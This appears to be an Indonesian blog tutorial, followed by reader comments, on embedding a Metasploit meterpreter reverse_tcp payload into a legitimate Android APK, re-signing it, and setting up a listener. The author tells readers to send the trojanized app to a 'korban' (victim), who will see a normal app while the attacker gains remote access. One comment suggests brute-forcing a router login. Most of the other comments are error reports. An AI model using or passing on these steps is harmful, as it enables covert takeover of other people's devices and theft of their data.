Untuk bahan bahannya siahkan download :
sudo ruby apk-embed.rb [aplikasi.apk] [msfvenom options]
sudo ruby apk-embed.rb com.leo.appmaster-3.3.2.apk -p android/meterpreter/reverse_tcp LHOST=192.168.48.1 LPORT=666
Infected file com_backdoored.apk ready.
java -jar signapk.jar certificate.pem key.pk8 fileasli.apk filehasilsign.apk
java -jar certificate.pem key.pk8 com_backdoored.apk com.leo.appmaster-3.3.2.apk
Selanjutnya kita set metasploit dengan ip dan port yang sama seperti di payload yang dibuat sebelum nya.
msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.48.1
LHOST => 192.168.48.1
msf exploit(handler) > set LPORT 666
LPORT => 666
msf exploit(handler) > exploit
Nah tinggal kirim apk file tadi ke korban.
APK yang telah disisipi payload tadi tetap akan terlihat normal di device korban.
Hanya saja saat aplikasi tersebut dibuka oleh korban, kita juga mendapatkan meterpreter akses di terminal kita.
Untuk yang masih bingung silahkan lihat video nya disini :
Misal di lain jaring ex internet, agar si korban dapat terhubung dengan penyerang tanpa penyerang memiliki sebuah ip public statis bagaimana? Lalu, semisal dalam sebuah jaringan LAN, host-host yang terhubung di jaringan tidak bisa berkomunikasi dengan host lainnya karena mungkin telah di forward ke ip tertentu dan exploitasi pun gagal karena tidak adanya hubungan penyerang dengan korban di satu jaringan. Pertanyaannya bagaimana caranya agar antar host bisa berkomunikasi di LAN tanpa merubah setting router?
Mohon maaf terlalu banyak kata2 bermaksud agar lebih detail. Terimakasih.
jika semua yang anda tanyakan bergantung dari Router krn kemungkinan tidak bisa tersambung Host-Host yang ada.coba saja dulu di brute Router Login nya gan dan kita
setting sendiri apa yg perlu kita ganti.ini biasanya terjadi karena si Admin men-Disable Broadcasting dari settingan Router nya itulah kenapa kita tidak bisa saling berkomunikasi antar host padahal masih dalam jangkauan LAN.
saya sendiri melakukan PenTest utk menguji Metasploit dalam jangkauan LAN tanpa menggunakan Port,kenapa bisa konek ?? ya itu Broadcasting nya tidak di Disable oleh admin karena jangkauan LAN nya itu adalah Komputer Labor sekolah saya dulu biasa digunakan utk ujian atau prakter komputer lainnya.
🙂
om kalo minta source code dari google itu gimana ya?
ane ada masalah kaya gini gan
java -jar signapk.jar testkey.x509.pem tesykey.pk8 psyphon.backdored.apk psyphon.apk
java.io.FileNotFoundException: tesykey.pk8 (No such file or directory)
at java.io.FileInputStream.open(Native Method)
at java.io.FileInputStream.(FileInputStream.java:146)
at com.android.signapk.SignApk.readPrivateKey(SignApk.java:136)
at com.android.signapk.SignApk.main(SignApk.java:319)
apk backdoor gagal gimana ini
Ini hasil orang lain. Yg bikin tulisan ini ga kreatif, cuman bisa copas punya orang luar. Payah
“copas” ? setolol itukah dirimu?
pake Backbox atau Kalilinux?
punya ane error gan gimana nih?
saya pake parrotsec gan
“Expception in thread “main” java.lag .NoClassDefFoundError : sun/misc/BASE64Encode”
Ya lord gitu aja